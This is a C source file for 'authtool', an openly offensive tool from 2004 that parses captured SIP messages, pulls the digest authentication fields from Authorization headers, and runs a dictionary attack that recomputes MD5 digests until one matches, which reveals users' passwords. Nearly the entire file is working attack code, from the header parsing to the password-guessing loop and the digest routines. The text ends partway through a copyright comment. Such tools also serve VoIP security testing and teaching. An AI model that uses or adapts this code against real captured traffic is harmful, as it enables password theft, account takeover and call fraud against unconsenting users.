//-------------------------------------------------------------------------------
//
//      authtool.c - Using a file of captured SIP messages, for
//                             each request message that includes an
//                             Authorization header line, this tool performs
//                             a dictionary attack in an attempt to produce
//                             the same MD5 digest contained in the message.
//                             The production of the same MD5 digest 
//                             constitutes the discovery of the password 
//                             for the user identified in the message From
//                             header line.
//
//                             A single password may be input on the
//                             command line in lieu of a dictionary.
//
//                             The tool records the results of the attack
//                             to a specified file and/or to the screen.
//
//    The Copyright statement immediately following applies to
//    all code within this source file except for functions:
//        CvtHex
//        DigestCalcHA1,
//        DigestCalcResponse
//    Those functions were extracted from Internet Society
//    RFC 2617 and the Internet Society Copyright applies to
//    them. See the preambles of those functions for the
//    Internet Society's peculiar copyright.
//
//    Copyright (C) 2004  Mark D. Collier/Mark O'Brien
//
//    This program is free software; you can redistribute it and/or modify
//    it under the terms of the GNU General Public License as published by
//    the Free Software Foundation; either version 2 of the License, or
//    (at your option) any later version.
//
//    This program is distributed in the hope that it will be useful,
//    but WITHOUT ANY WARRANTY; without even the implied warranty of
//    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
//    GNU General Public License for more details.
//
//    You should have received a copy of the GNU General Public License
//    along with this program; if not, write to the Free Software
//    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
//
//   Author: Mark D. Collier/Mark O'Brien - 09/20/2004  v1.0
//         www.securelogix.com - mark.collier@securelogix.com
//         www.hackingexposedvoip.com
//
//-------------------------------------------------------------------------------

#include "authtool.h"

int main (int argc, char **argv)
{
    int	i                   = 0,
        opt                 = 0;
			
    char line[2048];        // SIP message line

    signal( SIGTERM, catch_signals );
    signal( SIGINT, catch_signals );

    //  The minimum # of arguments are two:
    //	1) file of SIP messages to crack
    //	2) one of:
    //            a dictionary of passwords
    //            a single password

    if ( argc < 3 )
    {
        usage();
    }

    //
    //  parse the command line
    //

    while ((opt = getopt(argc, argv, "d:p:r:v")) != EOF)
    {
        switch (opt)
        {
            case 'd':                           //  Dictionary of passwords to attempt
                psDictionaryFile = optarg;
                break;
            case 'p':                           //  alternative to file of usernames/pwds
                psPassword = optarg;
                break;
            case 'r':                           //  results filename
                psResultsFile = optarg;
                break;
            case 'v':                           //  verbose option
                bVerbose = true;
                break;
            case 'h':                           //  usage
            case '?':
                usage();
                break;
        }
    }    
   
    //  getopt permutes the order of the parms in argv[] placing non-optional parms
    //  at the end of argv. optind should be the index of the 1st mandatory non-optional
    //  parm in argv[]  and there must be exactly 1 non-optional mandatory parm:
    //	filename of the captured messages to which the dictionary of passwords
    //      or the solitary password is to be applied
    
    if ( optind != (argc - 1) )
    {
        usage();
    }
	
    psCapturedMessagesFile = argv[optind++];
    
    //  Either a filename specifying a dictionary must be present, or the
    //  -p password option must be present, but not both.
    
    if ( ( !( psDictionaryFile || psPassword ) ) ||
            ( psDictionaryFile && psPassword ) )
    {
        printf( "\nspecify one of: -d dictionary or -p password\n" );
            usage();
    }
        
    hCapturedMessagesFile = fopen( psCapturedMessagesFile, "r" );
    
    if ( !hCapturedMessagesFile )
    {
        perror( "\nAuth Tool - Capture Messages file open error" );
        usage();
    }

    if ( psDictionaryFile )
    {
        hDictionaryFile = fopen( psDictionaryFile, "r" );
        
        if ( !hDictionaryFile )
        {
            perror( "\nAuth Tool - Dictionay file open error" );
            fclose( hCapturedMessagesFile );
            usage();
        }
    }
    
    if ( psResultsFile )
    {
        hResultsFile = fopen( psResultsFile, "w+");
        
        if ( !hResultsFile )
        {
            perror( "\nAuth Tool - Result File open error" );        
            fclose( hCapturedMessagesFile );
            
            if ( hDictionaryFile )
            {
                fclose( hDictionaryFile );
            }            
            usage();
        }
    }    
    
    //  print summary of scenario
    
    printf( "\n%s\n", __AUTHTOOL_VERSION );
    printf( "%s\n\n", __AUTHTOOL_DATE );

    printf( "Captured SIP Messages File: %s\n", psCapturedMessagesFile );
    
    if ( hDictionaryFile )
    {
        printf( "Password Dictionary File:   %s\n", psDictionaryFile );
    }
    else
    {
        printf( "Password to try:            %s\n", psPassword );
    }
    
    if ( hResultsFile )
    {
        fprintf( hResultsFile, "\n%s\n", __AUTHTOOL_VERSION );
        fprintf( hResultsFile, "%s\n\n", __AUTHTOOL_DATE );
        fprintf( hResultsFile, "Captured SIP Messages File: %s\n", psCapturedMessagesFile );
        
        if ( hDictionaryFile )
        {
            fprintf( hResultsFile, "Password Dictionary File:   %s\n", psDictionaryFile );
        }
        else
        {
            fprintf( hResultsFile, "Password to try:            %s\n", psPassword );
        }
        
        fprintf( hResultsFile, "\n1st output column: \"Authorization:\" header username parm" );
        fprintf( hResultsFile, "\n2nd output column: password discovered by dictionary attack" );
        fprintf( hResultsFile, "\n3rd output column: \"From:\" header URI parm - not the Auth header URI parm used to compute the MD5 digest\n\n" );
        
        printf( "Result File:                %s\n", psResultsFile );
    }
    
    printf( "\n" );
    
    //  This is where it all happens!
    
    solutions = 0;  //  No user/password solutions found
    
    while ( fgets( line, 2048, hCapturedMessagesFile ) != NULL )
    {
        if ( !foundRequest( line, &psMethod ) )  // current line is not SIP Request?
        {
            if ( !foundFrom( line, &psFrom ) )   // current line is not From header?
            {
                if ( foundAuthorization( line,   // current line is Authorization header?
                                         &psUser,
                                         &psRealm,
                                         &psNonce,
                                         &psUri,
                                         &psDigest
                                        ) )
                {
                    passwordHammer();
                }
            }
        }            
    } // end while ( capture message file line != NULL )
    
    printf( "\n%d user/password solutions found\n", solutions );
        
    CleanupAndExit( EXIT_SUCCESS );
    
} // end main


//-----------------------------------------------------------------------------
//
//   foundRequest
//
//   Called to parse a string, psLine, in order to determine
//   if a Request Line is present with one of the following
//   Methods.
//
//              REGISTER
//              INVITE
//              OPTIONS
//
//  If the 1st token found in the line starts at the 1st column
//  and matches one of the method strings, then the line is
//  declared to be a request line (i.e. True is returned). In that
//  case, the method is copied and the pointer to it is stored
//  in *psMethod. Otherwise, False is returned.
//
//  Note: the Method is duplicated via strndup() and therefore
//             must be freed at some point. If *psMethod is not
//             NULL, then it is presumed to point to a string which
//             must be freed at some point.
//
//  Limitation:
//         It is possible that a line in the body of a SIP message
//         (e.g. SDP) might happen to have a string beginning
//         in the 1st column that matches a Request method.
//         This function is not intelligent enough to distinguish
//         message bodies from SIP headers.
//
//  Tested: 09/20/2004 - Mark O'Brien
//
//-----------------------------------------------------------------------------

bool  foundRequest( char *psLine, char **psMethod )
{

    char *cp                    = NULL,
         *psHeader              = NULL;
 
    // Check if psLine might be the start of SIP Request message

    if ( isspace( psLine[0] ) )
    {
        return false;  //  Requst Method must start in 1st column
    }

    //  There is a token beginning in the 1st column. Scan to find the space
    //  that is required to end the SIP request Method.
    
    if (! ( cp = strchr( psLine, ' ' ) ) )
    {
        return false;
    }

    psHeader = (char *) strndup( psLine, cp - psLine );

    if ( !strcasecmp( psHeader, "REGISTER" ) ||
         !strcasecmp( psHeader, "INVITE"   ) ||
         !strcasecmp( psHeader, "OPTIONS"  ) )
    {
        //  found a new Method line
        
        if ( ! *psMethod )   //  the Method from a prior message is stored?
        {
            free( *psMethod );
        }

        if ( bVerbose )
        {
            printf( "\nRequest line = %s", psLine );
            
            if ( hResultsFile )
            {
                fprintf( hResultsFile, "\nRequest line = %s", psLine );
            }
        }
        
        *psMethod = psHeader;
        return true;         // this line might be the start of new SIP request
    }
    
    return false;

} // end foundRequest()


//-----------------------------------------------------------------------------
//
//   foundFrom
//
//   Called to parse a string, psLine, in order to determine
//   if a From header line is present.
//
//  If the 1st token found in the line starts at the 1st column
//  and matches the From header, then the line is declared
//  to be a From line. If the uri information is successfully
//  identified within the line, then that substring is
//  duplicated and a pointer to that text is stored in *psFrom.
//  In that case, true is returned, otherwise false. 
//
//  Note: the From text is duplicated via strndup() and therefore
//             must be freed at some point. If *psFrom is not
//             NULL, then it is presumed to point to a string which
//             must be freed at some point.
//
//  Limitations:
//         It is possible that a line in the body of a SIP message
//         (e.g. SDP) might happen to have a string beginning
//         in the 1st column that matches a From header.
//         This function is not intelligent enough to distinguish
//         message bodies from SIP headers.
//
//         This first implementation presumes the From header
//         is a single line.
//
//         This first implementation presumes no header
//         abbreviations
//
//  Tested: 09/20/2004 - Mark O'Brien
//
//-----------------------------------------------------------------------------

bool  foundFrom( char *psLine, char **psFrom )
{
    char *cp                        = NULL,
         *psHeader                  = NULL,
         *psLineLower               = NULL,
         *psStartUri                = NULL,
         *psEndUri                  = NULL;
    
    int  i;

    if ( isspace( psLine[0] ) )
    {
        return false;  //  From header must start in 1st column
    }

    //  There is a token beginning in the 1st column. Scan to find the space
    //  that is required to end the From header text.
    
    if (! ( cp = strchr( psLine, ' ' ) ) )
    {
        return false;
    }

    psHeader = (char *) strndup( psLine, cp - psLine );
    
    if ( strcasecmp( psHeader, "From:" ) )
    {
        free( psHeader );
        return false;
    }
    
    free( psHeader );

    if ( bVerbose )
    {
        printf( "\nFrom line = %s", psLine );
        
        if ( hResultsFile )
        {
            fprintf( hResultsFile, "\nFrom line = %s", psLine );
        }
    }

    if (! ( psStartUri = strchr( cp + 1, '<' ) ) )
    {
        return false;
    }
    
    if (! ( psEndUri = strchr( psStartUri + 1, '>' ) ) )
    {
        return false;
    }
    
    //  Found the URI, copy it from the line
    
    if ( ! *psFrom )
    {
        free( *psFrom );
    }
        
    *psFrom = (char *) strndup( psStartUri, psEndUri - psStartUri + 1 );
        
    return true;

}  // end foundFrom()


//-----------------------------------------------------------------------------
//
//   foundAuthorization
//
//   Called to parse a string, psLine, in order to determine
//   if what appears to be a SIP request message Authorization
//   header is present. If an Authorization header is found,
//   an attempt is made to identify the following parms
//   that should be present within the line:
//
//                  username
//                  realm
//                  nonce
//                  uri
//                  MD5 digest
//
//  Each parm value is expected to be enclosed in double quotes.
//
//         e.g.  username="royce"
//
//  For each properly constructed parm found, the input
//  line is modified to effectively create a substring within
//  the line (i.e. a NUL char replaces the ending double
//  quote of a parm's value). A pointer is set to record the
//  beginning that parm value (i.e. just after the opening
//  dbl quote.
//
//  True is only returned if the line begins with the proper
//  Authorization header sting and all of the parms are
//  found, otherwise False. 
//
//  Limitations:
//         It is possible that a line in the body of a SIP
//         message (e.g. SDP) might happen to have a
//         string beginning in the 1st column that matches
//         an Authorization header. And it might also 
//         contain the parms. This function is not intelligent
//         enough to distinguish message bodies from SIP
//         headers.
//
//    This first implementation presumes Authorization is a single line
//    This first implementation presumes no header abbreviations
//
//  Note: Destructive call to psLine - see above.
//
//  Tested: 09/20/2004 - Mark O'Brien
//
//-----------------------------------------------------------------------------

bool  foundAuthorization( char  *psLine,
                          char **psUser,
                          char **psRealm,
                          char **psNonce,
                          char **psUri,
                          char **psDigest
                        )
{
    char *cp                        = NULL,
         *psHeader                  = NULL,
         *psLineLower               = NULL,
         *psLineForErrorReporting   = NULL,
         *psUserNameHeader          = NULL,
         *psRealmHeader             = NULL,
         *psNonceHeader             = NULL,
         *psUriHeader               = NULL,
         *psResponseHeader          = NULL,
         *psCloseDblQuote           = NULL;
    
    int  i;
        
    if ( isspace( psLine[0] ) )
    {
        return false;  //  Authorization header must start in 1st column
    }

    //  There is a token beginning in the 1st column. Scan to find the space
    //  that is required to end the Authorization header text.
    
    if (! ( cp = strchr( psLine, ' ' ) ) )
    {
        return false;
    }

    psHeader = (char *) strndup( psLine, cp - psLine );
    
    if ( strcasecmp( psHeader, "Authorization:" ) )
    {
        if (strcasecmp ( psHeader, "Proxy-Authorization:" ) )
        {
            free( psHeader );
            return false;
        }
    }
    
    free( psHeader );

    if ( bVerbose )
    {
        printf( "\nAuthorization line = %s", psLine );
        
        if ( hResultsFile )
        {
            fprintf( hResultsFile, "\nAuthorization line = %s", psLine );
        }
    }
    
    //
    //  Since this function is destructive to the input line, save a duplicate a
    //  copy for use in error reporting
    //
    psLineForErrorReporting = (char *) strndup( psLine, strlen( psLine) );

    //  Parse Authorization line for components required
    //  to perform password attack. Presume components are
    //  in no particular order.

    //  Make a lower case copy of the remaining line to faciliate scanning
    //  for parm fields in a case-insensitive manner. The position of scanning
    //  results in psLineLower are translated back to the original string
    //  pointed to by psLine. psLine is modified to replace the dbl quote ending
    //  the parm values with end-of-string characters (i.e. '\0'). In effect,
    //  psLine is carved up into substrings.

    psLineLower = (char *) strndup( cp, strlen( cp ) );
    
    for ( i = 0; i < strlen( psLineLower ); i++ )
    {
        psLineLower[i] = tolower( psLineLower[i] );
    }
    
    //  Scan for the username parameter
    
    if ( !( psUserNameHeader = strstr( psLineLower, "username=\"" ) ) )
    {
        if ( bVerbose )
        {
            printf( "Authorization line: no username value:\n%s\n",
                    psLineForErrorReporting );
            
            if ( hResultsFile )
            {
                fprintf( hResultsFile,
                         "Authorization line: no username value:\n%s\n",
                         psLineForErrorReporting );
            }            
        }
        
        free( psLineLower );
        free( psLineForErrorReporting );
        return false;
    }
    
    //  Translate the position of the matching pattern from the case-insensitive
    //  scanning string back to the original line.
    
    *psUser = cp + ( psUserNameHeader + strlen( "username=\"" ) - psLineLower );
    psCloseDblQuote = *psUser;
    
    if ( !( psCloseDblQuote = strchr( psCloseDblQuote, '"' ) ) ) // scan for ending dbl quote
    {
        if ( bVerbose )
        {
            printf( "Authorization line: malformed username value:\n%s\n",
                    psLineForErrorReporting );
            
            if ( hResultsFile )
            {
                fprintf( hResultsFile,
                         "Authorization line: malformed username value:\n%s\n",
                         psLineForErrorReporting );
            }
        }
        
        free( psLineLower );
        free( psLineForErrorReporting );
        return false;
    }

    *psCloseDblQuote = '\0'; // Isolate the username in-line as a string.
    
    //  Scan for the realm parameter
        
    if ( !( psRealmHeader = strstr( psLineLower, "realm=\"" ) ) )
    {
        if ( bVerbose )
        {
            printf( "Authorization line: no realm value:\n%s\n",
                    psLineForErrorReporting );
            
            if ( hResultsFile )
            {
                fprintf( hResultsFile,
                         "Authorization line: no realm value:\n%s\n",
                         psLineForErrorReporting );
            }
        }
        
        free( psLineLower );
        free( psLineForErrorReporting );
        return false;
    }
    
    //  Translate the position of the matching pattern from the case-insensitive
    //  scanning string back to the original line.
    
    *psRealm = cp + ( psRealmHeader + strlen( "realm=\"" ) - psLineLower );
    psCloseDblQuote = *psRealm;
    
    if ( !( psCloseDblQuote = strchr( psCloseDblQuote, '"' ) ) ) // scan for ending dbl quote
    {
        if ( bVerbose )
        {
            printf( "Authorization line: malformed realm value:\n%s\n",
                     psLineForErrorReporting );
            
            if ( hResultsFile )
            {
                fprintf( hResultsFile,
                         "Authorization line: malformed realm value:\n%s\n",
                         psLineForErrorReporting );
            }
        }
                
        free( psLineLower );
        free( psLineForErrorReporting );
        return false;
    }

    *psCloseDblQuote = '\0'; // Isolate the realm in-line as a string.

    //  Scan for the nonce parameter
    
    if ( !( psNonceHeader = strstr( psLineLower, "nonce=\"" ) ) )
    {
        if ( bVerbose )
        {
            printf( "Authorization line: no nonce value:\n%s\n",
                    psLineForErrorReporting );
            
            if ( hResultsFile )
            {
                fprintf( hResultsFile,
                         "Authorization line: no nonce value:\n%s\n",
                         psLineForErrorReporting );
            }
        }
        
        free( psLineLower );
        free( psLineForErrorReporting );
        return false;
    }

    //  Translate the position of the matching pattern from the case-insensitive
    //  scanning string back to the original line.
    
    *psNonce = cp + ( psNonceHeader + strlen( "nonce=\"" ) - psLineLower );    
    psCloseDblQuote = *psNonce;
    
    if ( !( psCloseDblQuote = strchr( psCloseDblQuote, '"' ) ) ) // scan for ending dbl quote
    {
        if ( bVerbose )
        {
            printf( "Authorization line: malformed nonce value:\n%s\n",
                    psLineForErrorReporting );

            if ( hResultsFile )
            {
                fprintf( hResultsFile,
                         "Authorization line: malformed nonce value:\n%s\n",
                         psLineForErrorReporting );
            }            
        }
                
        free( psLineLower );
        free( psLineForErrorReporting );
        return false;
    }

    *psCloseDblQuote = '\0'; // Isolate the nonce in-line as a string.
    
    //  Scan for the uri parameter
    
    if ( !( psUriHeader = strstr( psLineLower, "uri=\"" ) ) )
    {
        if ( bVerbose )
        {
            printf( "Authorization line: no uri value:\n%s\n",
                    psLineForErrorReporting );

            if ( hResultsFile )
            {
                fprintf( hResultsFile,
                         "Authorization line: no uri value:\n%s\n",
                         psLineForErrorReporting );
            }            
        }
                
        free( psLineLower );
        free( psLineForErrorReporting );        
        return false;
    }

    //  Translate the position of the matching pattern from the case-insensitive
    //  scanning string back to the original line.
    
    *psUri = cp + ( psUriHeader + strlen( "uri=\"" ) - psLineLower );
    psCloseDblQuote = *psUri;
    
    if ( !( psCloseDblQuote = strchr( psCloseDblQuote, '"' ) ) ) // scan for ending dbl quote
    {
        if ( bVerbose )
        {
            printf( "Authorization line: malformed uri value:\n%s\n",
                    psLineForErrorReporting );

            if ( hResultsFile )
            {
                fprintf( hResultsFile,
                         "Authorization line: malformed uri value:\n%s\n",
                         psLineForErrorReporting );
            }            
        }
                
        free( psLineLower );
        free( psLineForErrorReporting );
        return false;
    }

    *psCloseDblQuote = '\0'; // Isolate the uri in-line as a string.

    //  Scan for the digest response parameter. Later, we'll apply the passwords in the
    //  dictionary in an attempt to produce this exact value. If it is successfully
    //  computed, then the user's password has been found. 
    
    if ( !( psResponseHeader = strstr( psLineLower, "response=\"" ) ) )
    {
        if ( bVerbose )
        {
            printf( "Authorization line: no digest response value:\n%s\n",
                    psLineForErrorReporting );

            if ( hResultsFile )
            {
                fprintf( hResultsFile,
                         "Authorization line: no digest response value:\n%s\n",
                         psLineForErrorReporting );
            }            
        }
                
        free( psLineLower );
        free( psLineForErrorReporting );        
        return false;
    }
            
    //  Translate the position of the matching pattern from the case-insensitive
    //  scanning string back to the original line.
    
    *psDigest = cp + ( psResponseHeader + strlen( "response=\"" ) - psLineLower );
    psCloseDblQuote = *psDigest;
    
    if ( !( psCloseDblQuote = strchr( psCloseDblQuote, '"' ) ) ) // scan for ending dbl quote
    {
        if ( bVerbose )
        {
            printf( "Authorization line: malformed digest response value:\n%s\n",
                    psLineForErrorReporting );

            if ( hResultsFile )
            {
                fprintf( hResultsFile,
                         "Authorization line: malformed digest response value:\n%s\n",
                         psLineForErrorReporting );
            }            
        }
                
        free( psLineLower );
        free( psLineForErrorReporting );
        return false;
    }

    *psCloseDblQuote = '\0'; // Isolate the digest in-line as a string.
    
    free( psLineLower );
    free( psLineForErrorReporting );
    return true;

} // end foundAuthorization()

//-----------------------------------------------------------------------------
//
//   passwordHammer
//
//   Returns True when a password is found that results
//   in a MD5 digest string which matches the digest string
//   pointed to by the global: psDigest.
//
//  For each password, this function uses globals:
//
//      psMethod
//      psUser
//      psRealm
//      psNonce
//      psUri
//      psCNonse
//      szNonceCount
//      psQop
//
//  and the current password to compute a MD5 digest.
//  That digest is compared to the global psDigest string.
//  When a match occurs, the password hammer returns true.
//  When all passwords have been exhausted without success,
//  the password hammer returns false.
//
//  Limitations:
//         The dictionary is well-formed - meaning that:
//           a) one password per line starting in the 1st column
//           b) alphanumeric - no characters that are normally
//                   prohibited in passwords (e.g. ', ", tabs, spaces, newlines)
//
//        Same limitation for the single optional password accepted
//        via the command line -p option
//
//  Tested: 09/20/2004 - Mark O'Brien
//
//-----------------------------------------------------------------------------

bool  passwordHammer()
{
    int i;
    
    char line[81];

    if ( bVerbose )
    {
        printf( "\nMethod = %s\nUser = %s\nRealm = %s\nNonce = %s\nURI = %s\nDigest = %s\n\n",
                psMethod, psUser, psRealm, psNonce, psUri, psDigest );
        
        if ( hResultsFile )
        {
            fprintf( hResultsFile,
                     "\nMethod = %s\nUser = %s\nRealm = %s\nNonce = %s\nURI = %s\nDigest = %s\n\n",
                     psMethod, psUser, psRealm, psNonce, psUri, psDigest );            
        }
    }

    if ( hDictionaryFile )
    {
        rewind( hDictionaryFile );
        
        while ( fgets( line, 80, hDictionaryFile ) != NULL )
        {
            if ( !isspace( line[0] ) )
            {        
                //  There is a token beginning in the 1st column.
                //  Scan to find the end of the password.
                
                psPassword = NULL;
                
                for ( i = 1; i < strlen( line ); i++ )
                {
                    if ( isspace( line[i] ) )
                    {
                        line[i] = '\0';
                        psPassword = line;
                        break;
                    }
                }
                
                if ( psPassword )
                {
                    if ( bVerbose )
                    {
                        printf( "Attempting password: %s\n", psPassword );
                        
                        if ( hResultsFile )
                        {
                            fprintf( hResultsFile,
                                     "Attempting password: %s\n",
                                     psPassword );
                        }
                    }
                    
                    DigestCalcHA1( "md5",
                                   psUser,
                                   psRealm,
                                   psPassword,
                                   psNonce,
                                   psCNonce,
                                   HA1 );
                    
                    DigestCalcResponse( HA1,
                                        psNonce,
                                        szNonceCount,
                                        psCNonce,
                                        psQop,
                                        psMethod,
                                        psUri,
                                        HA2,
                                        digestResponse );

                    if ( bVerbose )
                    {
                        printf( "Response Digest = %s\n", digestResponse );
                        
                        if ( hResultsFile )
                        {
                            fprintf( hResultsFile,
                                     "Response Digest = %s\n",
                                     digestResponse );
                        }
                    }
                    
                    if ( !strcmp( psDigest, digestResponse ) )
                    {
                        //  If a result file has not been specified, make sure to output this
                        //  success to the monitor even if verbose was not specified.
                        
                        if ( bVerbose || !hResultsFile )
                        {
                            printf( "User: %s  Password: %s  From: %s\n",
                                    psUser, psPassword, psFrom );
                        }
                        
                        if ( hResultsFile )
                        {
                            fprintf( hResultsFile, "%s\t\t%s\t\t%s\n",
                                     psUser, psPassword, psFrom );
                        }

                        solutions++;
                        return true;
                    }
                }
            }
                    
        } // end while(more passwords)
    }
    else // must be using the optional command line password
    {
        // Now have the minumum inputs required to calculate the
        // MD5 digest response
    
        DigestCalcHA1( "md5",
                       psUser,
                       psRealm,
                       psPassword,
                       psNonce,
                       psCNonce,
                       HA1 );
        
        DigestCalcResponse( HA1,
                            psNonce,
                            szNonceCount,
                            psCNonce,
                            psQop,
                            psMethod,
                            psUri,
                            HA2,
                            digestResponse );

        if ( bVerbose )
        {
            printf( "\nResponse Digest = %s\n", digestResponse );
            
            if ( hResultsFile )
            {
                fprintf( hResultsFile, 
                         "Response Digest = %s\n",
                         digestResponse );
            }
        }
        
        if ( !strcmp( psDigest, digestResponse ) )
        {
            //  If a result file has not been specified, make sure to output this
            //  success to the monitor even if verbose was not specified

            if ( bVerbose || !hResultsFile )
            {
                printf( "User: %s  Password: %s  From: %s\n",
                        psUser, psPassword, psFrom );
            }
            
            if ( hResultsFile )
            {
                fprintf( hResultsFile, "%s\t\t%s\t\t%s\n",
                         psUser, psPassword, psFrom );
            }
            
            solutions++;            
            return true;
        }
    } 

    return false;
    
}  //  end passwordHammer()


//-----------------------------------------------------------------------------
//  catch_signals
//
//  signal catcher and handler
//  arg1: (int) signal number
//  ret:  none, we exit the program from here
//-----------------------------------------------------------------------------

void  catch_signals (int signo)
{
    switch (signo)
    {
        case	SIGINT:
        case	SIGTERM:
        {
            printf("\nexiting...\n");
            CleanupAndExit( EXIT_SUCCESS );
        }
    }
}


//-----------------------------------------------------------------------------
//  CleanupAndExit
//
//  arg1: (int) status to report  i.e. EXIT_SUCCESS or EXIT_FAILURE
//  ret:  the status (or nothing in the event the call to this funtion
//           is redundant
//-----------------------------------------------------------------------------

void  CleanupAndExit ( int status )
{
    int rc;

    if ( hCapturedMessagesFile )
    {
        if ( bVerbose )
        {
            printf( "\nclosing capture message file\n" );
        }
        
        fclose( hCapturedMessagesFile );
    }

    if ( hDictionaryFile )
    {
        if ( bVerbose )
        {
            printf( "\nclosing dictionary file\n" );
        }
        
        fclose( hDictionaryFile );
    }

    if ( hResultsFile )
    {
        if ( bVerbose )
        {
            printf( "\nclosing results file\n" );
        }

        fclose( hResultsFile);
    }
    
    if ( !psMethod )
    {
        free( psMethod );
    }

    if ( !psFrom )
    {
        free( psFrom );
    }
    
    exit( status );
}


//-------------------------------------------------------------------------------
//  The code for this function was extracted from RFC 2617,
//  HTTP Authentication: Basic and Digest Access Authentication
//
//  convert Hex
//
//   Copyright (C) The Internet Society (1999).  All Rights Reserved.
//
//   This document and translations of it may be copied and furnished to
//   others, and derivative works that comment on or otherwise explain it
//   or assist in its implementation may be prepared, copied, published
//   and distributed, in whole or in part, without restriction of any
//   kind, provided that the above copyright notice and this paragraph are
//   included on all such copies and derivative works.  However, this
//   document itself may not be modified in any way, such as by removing
//   the copyright notice or references to the Internet Society or other
//   Internet organizations, except as needed for the purpose of
//   developing Internet standards in which case the procedures for
//   copyrights defined in the Internet Standards process must be
//   followed, or as required to translate it into languages other than
//   English.
//
//   The limited permissions granted above are perpetual and will not be
//   revoked by the Internet Society or its successors or assigns.
//
//   This document and the information contained herein is provided on an
//   "AS IS" basis and THE INTERNET SOCIETY AND THE INTERNET ENGINEERING
//   TASK FORCE DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING
//   BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION
//   HEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF
//   MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.
//
//   And that code in RFC 2617 was itself derived from RFC 1321 to which
//   an RSA Copyright applies:
//
//  Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
//  rights reserved.
//
//  License to copy and use this software is granted provided that it
//  is identified as the "RSA Data Security, Inc. MD5 Message-Digest
//  Algorithm" in all material mentioning or referencing this software
//  or this function.
//
//  License is also granted to make and use derivative works provided
//  that such works are identified as "derived from the RSA Data
//  Security, Inc. MD5 Message-Digest Algorithm" in all material
//  mentioning or referencing the derived work.
//
//  RSA Data Security, Inc. makes no representations concerning either
//  the merchantability of this software or the suitability of this
//  software for any particular purpose. It is provided "as is"
//  without express or implied warranty of any kind.
// 
//  These notices must be retained in any copies of any part of this
//  documentation and/or software.
//
//-------------------------------------------------------------------------------

void  CvtHex(
    IN HASH Bin,
    OUT HASHHEX Hex
    )
{
    unsigned short i;
    unsigned char j;

    for (i = 0; i < HASHLEN; i++) {
        j = (Bin[i] >> 4) & 0xf;
        if (j <= 9)
            Hex[i*2] = (j + '0');
         else
            Hex[i*2] = (j + 'a' - 10);
        j = Bin[i] & 0xf;
        if (j <= 9)
            Hex[i*2+1] = (j + '0');
         else
            Hex[i*2+1] = (j + 'a' - 10);
    }
    Hex[HASHHEXLEN] = '\0';
}


//-------------------------------------------------------------------------------
//  The code for this function was extracted from RFC 2617,
//  HTTP Authentication: Basic and Digest Access Authentication
//
//  calculate H(A1) as per spec 
//
//   Copyright (C) The Internet Society (1999).  All Rights Reserved.
//
//   This document and translations of it may be copied and furnished to
//   others, and derivative works that comment on or otherwise explain it
//   or assist in its implementation may be prepared, copied, published
//   and distributed, in whole or in part, without restriction of any
//   kind, provided that the above copyright notice and this paragraph are
//   included on all such copies and derivative works.  However, this
//   document itself may not be modified in any way, such as by removing
//   the copyright notice or references to the Internet Society or other
//   Internet organizations, except as needed for the purpose of
//   developing Internet standards in which case the procedures for
//   copyrights defined in the Internet Standards process must be
//   followed, or as required to translate it into languages other than
//   English.
//
//   The limited permissions granted above are perpetual and will not be
//   revoked by the Internet Society or its successors or assigns.
//
//   This document and the information contained herein is provided on an
//   "AS IS" basis and THE INTERNET SOCIETY AND THE INTERNET ENGINEERING
//   TASK FORCE DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING
//   BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION
//   HEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF
//   MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.
//
//   And that code in RFC 2617 was itself derived from RFC 1321 to which
//   an RSA Copyright applies:
//
//  Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
//  rights reserved.
//
//  License to copy and use this software is granted provided that it
//  is identified as the "RSA Data Security, Inc. MD5 Message-Digest
//  Algorithm" in all material mentioning or referencing this software
//  or this function.
//
//  License is also granted to make and use derivative works provided
//  that such works are identified as "derived from the RSA Data
//  Security, Inc. MD5 Message-Digest Algorithm" in all material
//  mentioning or referencing the derived work.
//
//  RSA Data Security, Inc. makes no representations concerning either
//  the merchantability of this software or the suitability of this
//  software for any particular purpose. It is provided "as is"
//  without express or implied warranty of any kind.
// 
//  These notices must be retained in any copies of any part of this
//  documentation and/or software.
//
//-------------------------------------------------------------------------------

void  DigestCalcHA1(
    IN char * pszAlg,
    IN char * pszUserName,
    IN char * pszRealm,
    IN char * pszPassword,
    IN char * pszNonce,
    IN char * pszCNonce,
    OUT HASHHEX SessionKey
    )
{
      MD5_CTX Md5Ctx;
      HASH HA1;

      MD5Init(&Md5Ctx);
      MD5Update(&Md5Ctx, pszUserName, strlen(pszUserName));
      MD5Update(&Md5Ctx, ":", 1);
      MD5Update(&Md5Ctx, pszRealm, strlen(pszRealm));
      MD5Update(&Md5Ctx, ":", 1);
      MD5Update(&Md5Ctx, pszPassword, strlen(pszPassword));
      MD5Final(HA1, &Md5Ctx);
      if (strcasecmp(pszAlg, "md5-sess") == 0) {
            MD5Init(&Md5Ctx);
            MD5Update(&Md5Ctx, HA1, HASHLEN);
            MD5Update(&Md5Ctx, ":", 1);
            MD5Update(&Md5Ctx, pszNonce, strlen(pszNonce));
            MD5Update(&Md5Ctx, ":", 1);
            MD5Update(&Md5Ctx, pszCNonce, strlen(pszCNonce));
            MD5Final(HA1, &Md5Ctx);
      }
      CvtHex(HA1, SessionKey);
}


//-------------------------------------------------------------------------------
//  The code for this function was extracted from RFC 2617,
//  HTTP Authentication: Basic and Digest Access Authentication
//
//  calculate request-digest/response-digest as per HTTP Digest spec
//
//   Copyright (C) The Internet Society (1999).  All Rights Reserved.
//
//   This document and translations of it may be copied and furnished to
//   others, and derivative works that comment on or otherwise explain it
//   or assist in its implementation may be prepared, copied, published
//   and distributed, in whole or in part, without restriction of any
//   kind, provided that the above copyright notice and this paragraph are
//   included on all such copies and derivative works.  However, this
//   document itself may not be modified in any way, such as by removing
//   the copyright notice or references to the Internet Society or other
